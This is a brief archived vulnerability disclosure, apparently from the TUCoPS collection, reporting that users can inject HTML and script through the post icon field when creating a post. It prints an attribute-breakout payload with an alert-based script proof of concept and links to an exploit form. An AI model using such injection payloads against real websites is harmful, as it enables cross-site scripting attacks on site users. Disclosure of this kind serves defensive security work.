Any user can inject html code when create a new post.
The bug are in the post icon:
<img src="icon.gif" etc.>
If you create a personalized form with this code:
icon.gif"><script>alert('bug');<script><any
tag="
the final code of the post icon is:
<img
src="icon.gif"><script>alert('bug');<script><any
tag="" etc.>
The exploit form is here:
http://members.fortunecity.it/lethalman2002/bugs/splatt.html
by Lethal Lab (Lethalman)
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
